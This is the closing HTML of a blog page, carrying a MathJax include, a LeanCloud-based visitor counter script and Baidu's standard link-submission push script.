    <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("EAvSG3QtXW1dqzq5WQ5CjH7S-gzGzoHsz", "2aiWv7vIfVY4CjKc49aPBHFX");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

</body>
</html>
